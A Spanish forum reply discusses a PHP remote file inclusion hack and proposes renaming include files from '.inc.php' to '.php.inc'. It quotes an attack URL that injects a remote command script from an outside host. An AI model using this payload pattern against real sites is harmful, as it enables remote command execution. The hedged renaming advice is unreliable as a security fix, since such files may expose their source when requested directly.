Hola,

Muy interesante el tema. Me gustaria dar mi opinion y espero que sea la acertada sino corrijanme, jeje

Para empezar en "el caso real" que aparece y comenta el autor del texto veo que el webmaster al que hackean nombra los archivos acabados en .inc.php "inc/functions.inc.php" a mi entender es un error si no las va a ejecutar como paginas individuales php pero si son funciones que va a incluir en otra pagina PHP deberia renombrarlo a .php.inc quedando asi "inc/functions.php.inc" de este modo si algun intruso introduce directamente la direccion del archivo, el codigo que contiene dicho archivo no se ejecutaria. De este modo "nuestro" hacker no podria jodernos con su metodo

http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://tuweb.com/cmd.txt?&cmd=comando

puesto que no se ejecutaria como una pagina PHP. Vamos, creo yo que de este modo se soluciona y si me equivoco agradeceria que me corrigieran.